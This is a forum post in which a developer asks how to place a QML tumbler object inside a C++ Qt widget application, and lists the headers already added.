QQuickWidget *view;
- added to setup of CPP file
view = new QQuickWidget; view->setSource(QUrl::fromLocalFile("Tumbler.qml")); view->show();
But I'm having error messages
mainwindow.cpp:-1: error: undefined reference to `QQuickWidget::QQuickWidget(QWidget*)' mainwindow.cpp:-1: error: undefined reference to `QQuickWidget::setSource(QUrl const&)' mainwindow.cpp:-1: error: undefined reference to `QQuickWidget::QQuickWidget(QWidget*)' mainwindow.cpp:-1: error: undefined reference to QQuickWidget::setResizeMode(QQuickWidget::ResizeMode)' :-1: error: collect2: error: ld returned 1 exit status
Did I include the wrong library or something????
BTW: I also added a QQuickWidget to the ui which is named 'view'
- jsulm Moderators
@bask185 said in Add QML objects to your C++ widget application.:
QQuickWidget
Did you add
QT += quickwidgets
to your pro file as is stated here ?
Ok that solved the error problems. I don't think I will forget this a 3rd time @jsulm ;)
I also ditched the code I had and I moved the QML file to the resource folder. Using Qt creator's convenient style sheet bar thing (that bar in the UI on the right with all the parameters) I selected the QML file and I got me a working Tumbler \o/
I am only far removed from the part in which this tumbler is going to be but... minor detail
|
https://forum.qt.io/topic/81264/add-qml-objects-to-your-c-widget-application
|
CC-MAIN-2017-51
|
refinedweb
| 371
| 64.41
|
In EPiServer CMS 6 R2 there is a new possibility to easily create Dynamic Content plugins from (User)Controls just by decorating them with an attribute. The idea has been implemented outside EPiServer for previous versions, for example here. The new “official” approach is described in this tech note.
Dynamic content plugins are required to persist their state (if any, you could implement stateless dynamic content which for example fetches information from a fixed resource) as a string. In the “classic” pattern you implement the state serialization yourself.
In the Control-based pattern the Framework does this for you. All you need to do is to give your Control public properties of any type that inherit PropertyData and they will be persisted (currently there’s a bug with PropertyXhtmlString though). There are also some shortcuts for strings, integers etc., read more in the tech note.
The design of this state storage isn’t optimal for all situations though…
The state storage of Control-based properties is handled by the EPiServer.DynamicContent.DynamicContentAdapter<T> generic class, inheriting from DynamicContentBase in the same namespace. The latter contains the code persisting the state and what it does is to loop over the properties and store a base64-encoded string for each, separating the substrings with pipes (‘|’).
Upon deserialization the properties are again looped over and the state string is split and decoded. But if you have added properties to your class “above” any of the exiting properties in the class the state will be restored to the wrong property! This is because the properties are not distinguished by anything other than their order.
So if you would decide to update your dynamic content by adding, say, a Heading property and place that at the top of the file (because you want it at the top of the Dynamic content editor) all your existing inserted dynamic content would be reduced to a smoking pile of junk, more or less.
Don’t add properties to dynamic content plugins based on DynamicContentBase that is already in use. Or if you have to, add them last in the class. Or override the State property (not possible for Control-based DC). Or start out with your own implementation and state storage that you can do your best to future-proof and make backwards-compatible updates in.
I've reported this as a bug. Sorry for any inconvenience.
More a weakness than a bug perhaps, no worries :) But make sure any new implementation is backwards compatible.
|
https://world.episerver.com/blogs/Magnus-Rahl/Dates/2011/4/Property-problems-in-DynamicContentBase--Control-based-Dynamic-content/
|
CC-MAIN-2019-35
|
refinedweb
| 417
| 53.71
|
Introduction:.
It features 96 LED's that light up 52 'digit' regions. Unlike the original, it features a circular design that includes a seconds ring, instead of a horizontal bar layout. The outer band indicates seconds in conjunction with the middle dot, the next two bands indicate minutes, with the final inner bands indicating hours.
If you have some scrap material and extra time on your hands, why not use this time to make something that will show it!
There are a few changes I would make to this project if I were to make it again. First, I would paint the frame and LED board white instead of black. This would reflect more light through the large lens in the front. I would also wait until the end to insert the LED's. I needed the board to be finished earlier so it could help me with writing the code. With that out of the way, let's first learn how to read it!
Step 1: How to Read the Clock
The clock is read from the inner circles to the outer. The inner ring of four fields denote five full hours each, alongside the second ring, also of four fields, which denote one full hour each, displaying the hour value in 24-hour format. The third ring consists of eleven fields, which denote five full minutes each, the next ring has another four fields, which mark one full minute each. Finally the outer ring of 29 fields denote even seconds with the light in the center blinking to denote odd (when lit) or even-numbered (when unlit) seconds.
For example, the above image has 1 of the five hour digits, 3 of the one hour digits, 8 of the five minute digits, 4 of the one minute digits, and 23 of the two second digits and the middle second digit lit up.
1x5 + 3x1 : 8x5 + 4x1 : 23x2 + 1x1 = 8:44:47 = 8:44:47 AM
The time shown above is: 3x5 + 0x1 : 3x5 + 2x1 : 5x2 + 1x1 = 15:17:11 = 3:17:11 PM
The time shown above is: 3x5 + 2x1 : 3x5 + 3x1 : 16x2 + 1x1 = 17:18:33 = 5:18:33 PM
Step 2: Tools and Materials
Electronics Materials:
- Arduino Nano
- Real Time Clock
- Addressable LEDs
- Power Plug
- Power Cable
- USB Power Plug
- Light Dependent Resistor and balanced resistor (if you want it to dim at night)
- Wire
Woodworking Materials:
- 3/4 in. Plywood
- Thin Plywood
- Scrap Wood (I used 2x4s but hardwood would work as well)
- Paint
- Acrylic 30 x 36 in. Sheet (found at local home improvement store)
- Window Tint (try to source locally. If none is available, you can find a sheet large enough here)
- Window Tint Application Fluid (I used water mixed with baby shampoo in a spray bottle)
- Windex
- Butcher Paper
- Screws
- Spray Adhesive
- Glue
- Glue Stick
Tools:
- Ruler
- Xacto Knife
- Tape
- Double Sided Tape
- Compass
- Circle Cutting Jig
- Jigsaw
- Bandsaw
- Spindle Sander
- Palm Sander
- Disc Sander
- Router Table
- Awl
- Drill and Drill Bits/Drivers
- Clamps
- Soldering Iron
- Solder
- Wire Strippers
Step 3: Assemble Templates
For the large template, print it off using the poster setting in Adobe Reader. Trim off the margins for each paper and tape together. The vertical, horizontal, and diagonal lines will help in lining up the template. The pages all have small numbers on them to help keep them organized if they fall out of order.
All templates and files needed are found in Step 26.
Step 4: Rough Cut Circles
Laying out the two templates on a sheet of 3/4 in. plywood, draw circles a bit larger than needed with a compass. Using a jigsaw, cut out the rough shape.
Step 5: Cut to Size
Using a circle cutting jig on the bandsaw, cut the circles to final size.
Step 6: Apply Template
Using spray adhesive, apply each template to a circle. Insert a nail in the center of the template to center it on the circle.
Step 7: Cut Template
Using a jigsaw, cut out each individual window of the template. If you have access to a CNC, this step would be much easier! I drilled a hole in each window to help with this process. As you start cutting, the template may start to come off. If this happens, you can secure it in place with small pieces of tape.
Step 8: Sanding
Using sandpaper applied to a stick, a spindle sander, and palm sander, sand and smooth out the rough cut left by the jigsaw.
Step 9: Drill Holds for LEDs
Mark the center of each hole with an awl and drill clearance holes for the LEDs. I used a guide to help keep the drill perpendicular to my workpiece and a backerboard to keep from blowing out the wood on the back.
Step 10: Combine Boards
Swap the front and back boards and trace parts of the frame on the back of the LED board. Move the frame back to the front of the LED board and drill holes and screw the pieces together.
See image notes for more information.
Step 11: Insert LEDs
Push the LEDs through the back of the LED board. The holes should be spaced just enough that you won't need to cut any wires except moving from one circle to the next.
From the back, the LEDs start in the center and then run counter clockwise then up to the next ring.
Step 12: Attach Segment 1
Cut out 9 segments from the "Segment 1" template attached on 3/4 in. plywood (found in step 26). Attach to the LED board with glue and clamps. If you are impatient you can also use nails to clamp it in place.
Once dry, sand the edge flush with a disc sander.
Step 13: Paint
Spray paint both the LED board and the frame. If I was making this again, I would have selected to use white paint instead of black as it would be more reflective through the lens.
Step 14: Segment 2
Cut out 9 segments from the "Segment 2" template attached out of wood that is 2 3/8 in. thick (found in step 26). I used some scrap 2x4s from around the shop. Dry fit the segments and ensure it fits well with a band clamp. If everything checks out, cover the outside with painters tape to keep the glue from sticking and let dry for at least an hour before moving on to the next step.
Step 15: Segment 3
Cut out 9 segments from the "Segment 3" template attached out of 3/8 in. thick scrapwood (found in step 26). Glue them so the seams from Segment 2 are in the middle of each Segment 3. This will strengthen the ring.
Step 16: Smooth Ring and Paint
I made a custom sanding block out of the offcut piece of the large ring. Sand the inside and outside of the ring and fill any cracks that may have appeared during the glue up process.
Once smooth, apply a few coats of black paint and clear coat.
Step 17: Cut Acrylic
Cut the acrylic to a square measuring 30 x 30 in. and mark the center. Attach the acrylic with double sided tape. Using a flush trim router bit, remove the excess acrylic
Step 18: Apply Window Tint
In a dust free environment, remove the protective film from the acrylic. Apply spray and remove backing from the window tint. Apply window tint sticky side down. Using a squeegee or credit card, squeeze out all the liquid from under the window tint. Once all bubbles and wrinkles have been removed, trim the excess window tint using a sharp knife.
Step 19: Attach Defuser
I used a large piece of butcher paper to act as a defuser. Lay out the paper on a flat surface. Cover the face of the frame with glue from a glue stick. Before the glue drys, lay the front of the clock face down on the paper and rough cut the excess. Once dry, use a sharp knife to trim flush.
Step 20: Apply Insulation
I used electrical tape to keep the power and data lines separate.
Step 21: Assemble
Remove the other protective layer from the acrylic. Place the acrylic inside the ring with the window tint side up. Slide the remainder of the clock into the ring. Use a clamp to apply light pressure while a hole is drilled through the ring and into the LED board. This should be roughly 1 1/8 in. from the back. Be careful not to drill into an LED. Screw a truss head screw into the hole. Repeat for a total of eight screws around the perimeter of the clock.
Step 22: Attach Anchor Points
Glue anchor points to the back of the clock for the back cover to attach to. These are 3/4 in. thick and about 2 in. long.
Step 23: Drill Power and LDR Sensor Holes
Drill a power hole through the bottom of the clock for the power plug and a hole in the top for the light dependent resistor (LDR) sensor.
Step 24: Install Electronics Holder
Install the 3D printed holder for the RTC and Arduino Nano. Connect all electronics as shown in the schematic.
Step 25: Back Cover
Cut a back cover from thin plywood just smaller than the outside of the clock. Drill holes into the anchor points. Find the center of the back and measure out 8 inches in either direction to cut keyholes (standard 16 in centers for studs in the US). I drilled the main hole just larger than the head of the screws I'm going to use and filed the hole larger in one direction. Paint black and attach the cover in place.
Step 26: Code and Files
Again, I'm fairly new to using many of the Arduino libraries used here so I'm sure there are better ways to utilize them.
I wrote the code to be easily updated based on how many LEDs you are using if the project is scaled up or down. All you need to do is update the LED starting and ending positions as well as how many LEDs are part of each digit.
I've added a few animations that play at startup as well as on the hour. They are sudo random based on the random number generator it has on board.
You can set the clock to cycle through colors or stay static at one. You can even highlight the indicator digit to help read time as shown in the introduction.
Feel free to edit and change the code as you wish.
#include "RTClib.h" #include <FastLED.h> #define NUM_LEDS 96 #define DATA_PIN 3 #define LDR A0 RTC_DS1307 rtc; boolean timeChange = false; boolean printTime = false; // Set to true if you want to see output in the console. Helpful for debugging. boolean redDown = true; boolean greenDown = false; boolean blueDown = false; boolean cycle = false; // Set true if you want clock colors to cycle boolean highlight = true; // Set true to highlight 'last digit'. // Locations of the start and end of each group of time const int SECOND_1_LOCATION = 0; const int HOUR_2_START_LOCATION = 1; const int HOUR_2_END_LOCATION = 8; const int HOUR_1_START_LOCATION = 9; const int HOUR_1_END_LOCATION = 20; const int MINUTE_2_START_LOCATION = 21; const int MINUTE_2_END_LOCATION = 42; const int MINUTE_1_START_LOCATION = 43; const int MINUTE_1_END_LOCATION = 66; const int SECOND_2_START_LOCATION = 67; const int SECOND_2_END_LOCATION = 95; const int LEDS_PER_HOUR_1 = 3; const int LEDS_PER_HOUR_2 = 2; const int LEDS_PER_MINUTE_1 = 6; const int LEDS_PER_MINUTE_2 = 2; // Multipliers used to split up time const int MULTIPLIER_FIVE = 5; const int MULTIPLIER_TWO = 2; const int START_UP_DELAY = 1; // Change this to speed up or slow down startup animation const int CYCLE_SPEED = 1; // Change the rate here for color changing cycle (must be above 1) // Declare variables int lastSecond = 0; int currentHour = 0; int currentMinute = 0; int currentSecond = 0; int hour1 = 0; int hour2 = 0; int minute1 = 0; int minute2 = 0; int second1 = 0; int second2 = 0; int cycleCount = 1; float fadeValue = 255; float fadeCheck = 255; uint8_t bright = 255; int numberOfAnimations = 5; int randomness = 0; // Set Colors uint8_t red = 0; uint8_t green = 0; uint8_t blue = 255; uint8_t highlight_red = 60; uint8_t highlight_green = 60; uint8_t highlight_blue = 255; // Define the array of leds CRGB leds[NUM_LEDS]; void setup() { Serial.begin(19200); FastLED.addLeds<WS2811, DATA_PIN, RGB>(leds, NUM_LEDS); LEDS.setBrightness(bright); FastLED.clear(); rtc.begin(); // Uncomment line below to set time. // rtc.adjust(DateTime(2020, 2, 19, 23, 59, 50)); // rtc.adjust(DateTime(F(__DATE__), F(__TIME__))); // Startup animation animate(randomness); } void loop() { // Get time DateTime now = rtc.now(); currentHour = now.hour(); currentMinute = now.minute(); currentSecond = now.second(); timeChange = false; // Use these to manually set time without RTC. Helpful for debugging // currentHour = 5; // currentMinute = 30; // currentSecond = 30; // Reset all bits to zero for (int i = SECOND_1_LOCATION; i <= SECOND_2_END_LOCATION; i++) { leds[i] = CRGB::Black; } // Set Hour // Set hour 1 hour1 = (currentHour % MULTIPLIER_FIVE) * LEDS_PER_HOUR_1; // This will count the total LEDs of the time unit to light up for (int i = HOUR_1_START_LOCATION; i < (HOUR_1_START_LOCATION + hour1); i++) { leds[i] = CRGB( red, green, blue); } if (highlight == true && hour1 > 0)// && hour1 < 12) { for (int i = (HOUR_1_START_LOCATION + hour1 - 1); i >= (HOUR_1_START_LOCATION + hour1 - LEDS_PER_HOUR_1); i--) { leds[i] = CRGB( highlight_red, highlight_green, highlight_blue); } } // Set hour 2 hour2 = (currentHour / MULTIPLIER_FIVE) * LEDS_PER_HOUR_2; // This will count the total LEDs of the time unit to light up for (int i = HOUR_2_START_LOCATION; i < (HOUR_2_START_LOCATION + hour2); i++) { leds[i] = CRGB( red, green, blue); } if (highlight == true && hour2 > 0)// && hour2 < 8) { for (int i = (HOUR_2_START_LOCATION + hour2 - 1); i >= (HOUR_2_START_LOCATION + hour2 - LEDS_PER_HOUR_2); i--) { leds[i] = CRGB( highlight_red, highlight_green, highlight_blue); } } // Set Minute // Set minute 1 minute1 = (currentMinute % MULTIPLIER_FIVE) * LEDS_PER_MINUTE_1; // This will count the total LEDs of the time unit to light up for (int i = MINUTE_1_START_LOCATION; i < (MINUTE_1_START_LOCATION + minute1); i++) { leds[i] = CRGB( red, green, blue); } if (highlight == true && minute1 > 0)// && minute1 < 24) { for (int i = (MINUTE_1_START_LOCATION + minute1 - 1); i >= (MINUTE_1_START_LOCATION + minute1 - LEDS_PER_MINUTE_1); i--) { leds[i] = CRGB( highlight_red, highlight_green, highlight_blue); } } // Set minute 2 minute2 = (currentMinute / MULTIPLIER_FIVE) * LEDS_PER_MINUTE_2; // This will count the total LEDs of the time unit to light up for (int i = MINUTE_2_START_LOCATION; i < (MINUTE_2_START_LOCATION + minute2); i++) { leds[i] = CRGB( red, green, blue); } if (highlight == true && minute2 > 0)// && minute2 < 22) { for (int i = (MINUTE_2_START_LOCATION + minute2 - 1); i >= (MINUTE_2_START_LOCATION + minute2 - LEDS_PER_MINUTE_2); i--) { leds[i] = CRGB( highlight_red, highlight_green, highlight_blue); } } // Set Second if (currentSecond != lastSecond) { timeChange = true; } // Set second 1 second1 = currentSecond % MULTIPLIER_TWO; if (second1 == 1) { leds[SECOND_1_LOCATION] = CRGB( red, green, blue); } // Set second 2 second2 = currentSecond / MULTIPLIER_TWO; for (int i = SECOND_2_START_LOCATION; i < (SECOND_2_START_LOCATION + second2); i++) { leds[i] = CRGB( red, green, blue); } if (highlight == true && second2 > 0)// && second2 < 29) { for (int i = (SECOND_2_START_LOCATION + second2 - 1); i >= (SECOND_2_START_LOCATION + second2 - 1); i--) { leds[i] = CRGB( highlight_red, highlight_green, highlight_blue); } } lastSecond = currentSecond; // Count cycles of the program and call the setColor function to change the color of the LEDs ever CYCLE_SPEED cycles. if (cycleCount < CYCLE_SPEED) { cycleCount++; } else if (cycleCount == CYCLE_SPEED && cycle == true) { cycleCount++; setColor(cycle); } else { cycleCount = 0; } // Animate every hour randomness = random(numberOfAnimations); if (currentMinute == 0 && currentSecond == 0) { animate(randomness); } // This equation is creating using interpolation to determine the brightness. // I suggest leaving it commented unless you find the LEDs too bright at night. // If you want to change the brightness of your lights and want to create your own equation, // search 'Interpolation' online and jump feet first into the world of numerial analysis. // fadeValue = analogRead(LDR) * -.18 + 333.71; // float readin = analogRead(LDR); // Serial.println(readin); // Serial.println(fadeValue); // if (fadeValue > bright) // { // fadeValue = bright; // } // else if (fadeValue < 150) // { // fadeValue = 150; // } // LEDS.setBrightness(fadeValue); FastLED.show(); // Print current time to the console if (timeChange == true && printTime == true) { printToConsole(); } } // Animation function add more animations here as you wish void animate(int select) { if (select == 0) { for (int i = SECOND_1_LOCATION; i <= SECOND_2_END_LOCATION; i++) { leds[i] = CRGB( red, green, blue); FastLED.show(); delay(START_UP_DELAY); } for (int i = SECOND_2_END_LOCATION; i >= SECOND_1_LOCATION; i--) { leds[i] = CRGB::Black; FastLED.show(); delay(START_UP_DELAY); } } else if (select == 1) { for (int i = 0; i < 250; i++) { int light = random(95); leds[light] = CRGB( red, green, blue); FastLED.show(); } } else if (select == 2) { leds[0] = CRGB( red, green, blue); for (int i = 0; i <= SECOND_2_END_LOCATION - SECOND_2_START_LOCATION; i++) { leds[SECOND_2_START_LOCATION + i] = CRGB( red, green, blue); if (i <= (MINUTE_1_END_LOCATION - MINUTE_1_START_LOCATION)) { leds[MINUTE_1_START_LOCATION + i] = CRGB( red, green, blue); } if (i <= (MINUTE_2_END_LOCATION - MINUTE_2_START_LOCATION)) { leds[MINUTE_2_START_LOCATION + i] = CRGB( red, green, blue); } if (i <= (HOUR_1_END_LOCATION - HOUR_1_START_LOCATION)) { leds[HOUR_1_START_LOCATION + i] = CRGB( red, green, blue); } if (i <= (HOUR_2_END_LOCATION - HOUR_2_START_LOCATION)) { leds[HOUR_2_START_LOCATION + i] = CRGB( red, green, blue); } delay(34); FastLED.show(); } } else if (select == 3) { leds[0] = CRGB( red, green, blue); for (int i = 0; i <= SECOND_2_END_LOCATION - SECOND_2_START_LOCATION; i++) { leds[SECOND_2_END_LOCATION - i] = CRGB( red, green, blue); if (i <= (MINUTE_1_END_LOCATION - MINUTE_1_START_LOCATION)) { leds[MINUTE_1_END_LOCATION - i] = CRGB( red, green, blue); } if (i <= (MINUTE_2_END_LOCATION - MINUTE_2_START_LOCATION)) { leds[MINUTE_2_END_LOCATION - i] = CRGB( red, green, blue); } if (i <= (HOUR_1_END_LOCATION - HOUR_1_START_LOCATION)) { leds[HOUR_1_END_LOCATION - i] = CRGB( red, green, blue); } if (i <= (HOUR_2_END_LOCATION - HOUR_2_START_LOCATION)) { leds[HOUR_2_END_LOCATION - i] = CRGB( red, green, blue); } delay(34); FastLED.show(); } } else if (select == 4) {); } } // Color cycling function void setColor(boolean cycleColors) { if (cycleColors == true) { if (redDown == true && greenDown == false) { red++; green--; if (green <= 0) { red = 255; redDown = false; greenDown = true; } } else if (greenDown == true && blueDown == false) { green++; blue--; if (blue <= 0) { green = 255; greenDown = false; blueDown = true; } } else if (blueDown == true && redDown == false) { blue++; red--; if (red <= 0) { blue = 255; blueDown = false; redDown = true; } } } else { red = 0; green = 0; blue = 255; } } // Print to Serial Monitor function void printToConsole() { Serial.print("Current Time: "); Serial.print(currentHour); Serial.print(":"); Serial.print(currentMinute); Serial.print(":"); Serial.println(currentSecond); Serial.println(" "); for (int i = HOUR_2_START_LOCATION; i <= HOUR_2_END_LOCATION; i++) { Serial.print(leds[i]); if (i % 2 == 0) { Serial.print(" "); } } Serial.println(" "); for (int i = HOUR_1_START_LOCATION; i <= HOUR_1_END_LOCATION; i++) { Serial.print(leds[i]); if (((i - HOUR_1_START_LOCATION + 1) % 3) == 0) { Serial.print(" "); } } Serial.println(" "); for (int i = MINUTE_2_START_LOCATION; i <= MINUTE_2_END_LOCATION; i++) { Serial.print(leds[i]); if (((i - MINUTE_2_START_LOCATION) + 1) % 2 == 0) { Serial.print(" "); } } Serial.println(" "); for (int i = MINUTE_1_START_LOCATION; i <= MINUTE_1_END_LOCATION; i++) { Serial.print(leds[i]); if (((i - MINUTE_1_START_LOCATION) + 1) % 6 == 0) { Serial.print(" "); } } Serial.println(" "); for (int i = SECOND_2_START_LOCATION; i <= SECOND_2_END_LOCATION; i++) { Serial.print(leds[i]); Serial.print(" "); } Serial.println(" "); Serial.println(leds[SECOND_1_LOCATION]); Serial.println(); for (int i = 0; i < NUM_LEDS; i++) { Serial.print(leds[i]); } Serial.println(); Serial.println(); }
Step 27: Enjoy!
In conclusion, this clock is wonderful to watch and once you get the hang of it, it's relatively easy to read. If you make your own clock project, let me know!
Participated in the
Arduino Contest 2020
3 People Made This Project!
- barkleysaurav0 made it!
Recommendations
32 Comments
Question 3 days ago
what is the led library?
Answer 10 hours ago
FastLED
9 months ago
Todos los proyector de ustedes son muy buenos me gusta aprender con ustedes
1 year ago
good project !!!
What is the value of the LDR resistors and the other?
Question 1 year ago
What drill bit size did you use?
Answer 1 year ago
For which step?
Reply 1 year ago
for drilling the holes for the LEDs.
Reply 1 year ago
I used a 15/32 in. drill bit.
1 year ago
how do I send you a privet mesage
Reply 1 year ago
Click on the 'tomatoskins' username right next to my picture. That will take you to my profile where you can click 'message'.
Question 1 year ago
Can I buy one off of you. PLEASE I can't find a single person who sells these types of clocks.
Answer 1 year ago
Thanks for the appreciation! My clock is truly one of a kind. :) I'm not open to building and selling one at this time, but I might be in a few months. Please send me a private message and we can discuss this further.
Reply 1 year ago
can I send you an e-mail and if so then please reply to this with your e-mail
1 year ago
Did you added light dependent resistors?
Reply 1 year ago
Yes, I did use an LDR.
Question 1 year ago on Step 3
How did you make the template? Its looks clean, and i want to make a template for my own project
Answer 1 year ago
I designed all my templates in Solidworks. You can probably do the same thing in Fusion360 and it is free to use.
1 year ago
Absolutely awesome. Just shows that if you have the tools, one can build anything. That is the part that makes things a bit difficult for me.
Great project1
Tip 1 year ago
Good
1 year ago
Awesome, good job!
|
https://www.instructables.com/Circular-Mengenlehreuhr/
|
CC-MAIN-2021-31
|
refinedweb
| 3,408
| 69.01
|
Working on the Global Escalation Services Team at Microsoft is really a cool gig. We’re privileged to work on several different Windows components at a very deep level so life is never boring. Here’s a list of the articles coming from the group in the next few weeks. Hope you enjoy!
Ron Stock
STORPORT Logging - Bob Golding discusses Storport logging. Beginning with the new versions, it is now possible to measure timing statistics for requests made to a system’s disk unit. These measurements are taken at the lowest possible level of OS interaction with the storage adapter hardware, making it much easier to diagnose storage performance issues.
Walking through a crash dump analysis – Chad Beeder walks through a debug.
Understanding !PTE Part 2 and Part 3 – Continuation of Ryan’s 3 part series
How DPM implements VSS – Dennis Middleton gives a high level view of how DPM implements the VSS API’s to manage replicas.
How Hyper-V does backups of running VM’s - Another article from Dennis
Pushlocks – Mark Lloyd discusses why it's important to use only published APIs.
Debugger Extension Blog – Ryan’s work with debugger extensions...
Hi )...
Hello folks, this is Pushkar and I recently worked an interesting case dealing with high CPU usage. The case was particularly interesting but it was not a business critical application consuming the CPU. I was tasked to identify why a third party Performance Monitoring tool was causing a performance issue on the server by consuming 100% of the CPU cycles. The irony of the issue itself made this particular case immensely interesting for me and I decided to investigate it further. Typically issues with third party products are addressed by the Application Vendor.
In this case the monitoring tool, Monitor.exe (disclaimer: Identity of the actual product has been removed), was consistently consuming 100% of the CPU cycles, and as expected if the tool was stopped, the CPU usage was back to normal. As I didn’t have information about how the tool worked, I decided to gather data to give me an idea about the underlying API's the tool was calling. This would give me an understanding of its behavior.
To begin with the troubleshooting I gathered Kernrate.exe logs from the server along with a memory dump. On platforms which are Windows Vista and upwards you can use the Windows Performance Toolkit (aka. Xperf), a better alternative to Kernrate.
Note: To learn more about kernrate.exe check here
A quick review of the Kernrate Log showed a lot of CPU time in the Kernel, and the function mostly called was NtQueryDirectoryObject()
TOTAL K 0:07:35.343 (49.2%) U 0:02:40.734 (17.4%) I 0:05:09.171 (33.4%) DPC 0:00:52.984 (5.7%) Interrupt 0:00:20.312 (2.2%)
Total Interrupts= 4208713, Total Interrupt Rate= 9098/sec.
-----------------------------
Results for Kernel Mode:
OutputResults: KernelModuleCount = 106
Percentage in the following table is based on the Total Hits for the Kernel
ProfileTime 116300 hits, 65536 events per hit --------
Module Hits msec %Total Events/Sec
PROCESSR 45160 462654 38 % 6397017
NTOSKRNL 43573 462654 37 % 6172215
SYMMPI 18258 462654 15 % 2586287
----- Zoomed module NTOSKRNL.EXE (Bucket size = 16 bytes, Rounding Down) --------
Percentage in the following table is based on the Total Hits for this Zoom Module
ProfileTime 43573 hits, 65536 events per hit --------
NtQueryDirectoryObject 8433 462654 19 % 1194553
memmove 6584 462654 14 % 932638
KeInsertQueueDpc 5593 462654 12 % 792261
KeFlushMultipleTb 3118 462654 7 % 441671
Further Investigation of a dump gathered indicated the function listed above was invoked to parse through the \BaseNamedObjects namespace in the kernel. BaseNamedObjects is a folder in the Kernel Object Namespace where various kernel objects: events, semaphores, mutexes, waitable timers, file-mapping objects, and job objects are created. The purpose of such global namespace is to enable processes on multiple client sessions to communicate with a service application. Another use of such namespace is for applications that use named objects to detect that there is already an instance of the application running in the system across all sessions.
I started looking under the \BaseNamedObjects namespace in the kernel and found there were numerous, over 2900 objects under that Namespace. You can use SysInternal tool WinObj.exe to browse through the Kernel Object Namespace and the list of objects within those namespaces. In my case I had no prior idea of the cause of the issue so I had to look at the dump file. I pasted a snapshot of the WinObj.exe ouput below along with a stack from the kernel dump.
kd> !object \BaseNamedObjects
Object: fffffa8000d72ec0 Type: (fffffadfe7acb1e0) Directory
ObjectHeader: fffffa8000d72e90 (old version)
HandleCount: 36 PointerCount: 10275 <- This indicates the Number of Object under this namespace
Directory Object: fffffa8000004060 Name: BaseNamedObjects
Hash Address Type Name
---- ------- ---- ----
00 fffffadfe5d79660 Job TestJobObj_9920
fffffadfe5d7a8e0 Job TestJobObj_9913
fffffadfe5d7b8e0 Job TestJobObj_9907
fffffadfe5d84060 Job TestJobObj_9850
fffffadfe5d863e0 Job TestJobObj_9843
fffffadfe5d873e0 Job TestJobObj_9837
fffffadfe5d8e060 Job TestJobObj_9790
fffffadfe5d903e0 Job TestJobObj_9783
fffffadfe5d913e0 Job TestJobObj_9777
fffffadfe5dad660 Job TestJobObj_9611
fffffadfe5dae660 Job TestJobObj_9605
fffffadfe5db7660 Job TestJobObj_9551
fffffadfe5db8660 Job TestJobObj_9545
fffffadfe5db98e0 Job TestJobObj_9538
<Snipped>
In my case the third party performance monitoring tool was experiencing high CPU when they queryied “Job Objects” and “Job Object Details” performance counters.
Since this was happening with a third party tool, I tried to recreate the issue in-house, and wrote a small utility to create a lot of Named Job Objects under \BaseNamedObjects namespace using CreateJobObject() API. Then I tried to use the plain old Perfmon tool built into Windows. The moment I tried to add the “Job Objects” & “Job Object Details” counters, the CPU utilization from MMC.EXE hit 90% (Perfmon runs as an MMC). Now I could reproduce the issue in-house so I investigated what happened when we try to query those counters.
Here is what I found:
When we attempt to query the Job Object or Job Object Details performance counter it invokes the following functions respectively in Perfproc.dll which would invoke NtQueryDirectoryObject() to locate the Object under the \BaseNamedObjects Namespace. Then it calls QueryInformationJobObject to gather the performance data related to that objects. One of the thread stacks is given below to show how the flow goes through
CollectJobDetailData()
CollectJobObjectData()
kd> kb
RetAddr : Args to Child : Call Site
fffff800`01040abd : 00000000`000ad490 fffff800`01385b47 00000000`00002990 00000000`00000000 : nt!NtQueryInformationJobObject
00000000`77ef171a : 00000000`77d423cb 00000000`000ad498 00000000`00000000 00000000`c0000135 : nt!KiSystemServiceCopyEnd+0x3
00000000`77d423cb : 00000000`000ad498 00000000`00000000 00000000`c0000135 00000000`00000000 : ntdll!ZwQueryInformationJobObject+0xa
000007ff`5a794a16 : 00000000`000ad990 00000000`00000008 00000000`00000400 00000000`000addf8 : kernel32!QueryInformationJobObject+0x77
000007ff`5a7932b9 : 00000000`0000dd20 000007ff`5a79aa84 00000000`00000001 00000000`00000040 : perfproc!CollectJobObjectData+0x356
000007ff`7feeb497 : 00000000`00000000 00000000`000adee0 00000000`00000000 00000000`00000001 : perfproc!CollectSysProcessObjectData+0x1f9
000007ff`7fef09d1 : 00000000`000ae1d0 00000000`00000000 00000000`0000007a 00000000`00000000 : ADVAPI32!QueryExtensibleData+0x951
000007ff`7fef0655 : 0039002d`00350038 00000000`77c43cbd 00000000`00000000 00000000`00000000 : ADVAPI32!PerfRegQueryValue+0x66d
000007ff`7ff0b787 : 00000000`00000000 00000000`00000000 00000000`000ae8a0 00000000`000ae888 : ADVAPI32!LocalBaseRegQueryValue+0x356
000007ff`5b17ba27 : 00009ae8`b8ee62a9 00000000`000c46a0 00000000`00200000 00000000`00000000 : ADVAPI32!RegQueryValueExW+0xe9
You can determine the type of performance data queried for each Job Object in Win32_PerfFormattedData_PerfProc_JobObject Class. Although it documents a WMI interface for querying the Performance Data, it represents the same data set the native API also queries.
Once I understood what was happening under the hood, it was easy to deduce that every iteration of the query will be a CPU intensive operation. For each object we are going to do a recursive query for the Performance Data as mentioned in the above document. If the number of items is large, and we are running a broader query of the nature “All Counters” & “All Instances” then every single iteration would consume a lot of CPU. To validate this, I got help from one of my colleagues, Steve Heller, who modified the sample code received from the vendor of the Monitoring Tool (Which demonstrated what they were doing). We noticed they were querying this information every 2.5 seconds. The sample tool demonstrated that with about 10,000 Job Objects, one single iteration of the query was taking roughly 12.5 seconds to complete. No wonder the CPU usage would remain high, because before we finish a single iteration of the query for all the Job Objects, four additional queries were already queued and the CPU Usage continued to remain at 90% or more.
The conclusion that can be drawn from this test is that querying \BaseNamedObjects namespace with a large number of objects under it will invariably result in a fair amount of CPU usage. This could get worse if the query is performed for complex objects e.g., Job Objects for which we would run nested queries for individual Performance Data for each Job Object, and if the data is queried too frequently.
The two aspects responsible for the high CPU usage are:
1. The frequency at which the Performance Data was being queried
2. The number of objects under \BaseNamedObjects namespace.
Though there is no defined limitation on the number of objects that can be created under various Kernel Object Namespaces, absence of such documents doesn’t mean that we should simply create a lot of objects. Applications should be designed carefully to use such kernel resources judiciously.
At the same time because we can query a lot of performance data as the interfaces are publicly available, doesn’t mean we should query them at a very high frequency. Certain operations can be CPU intensive as we have seen here and we should identify what we really want to query and at what frequency.
Quoting for the MSDN article Job Objects
“A job object allows groups of processes to be managed as a unit. Job objects are namable, securable, sharable objects that control attributes of the processes associated with them. Operations performed on the job object affect all processes associated with the job object.”
The above point clearly indicates that the Job Object Framework is intended for processes which are participating in a Job to monitor and control each other’s resource usage.
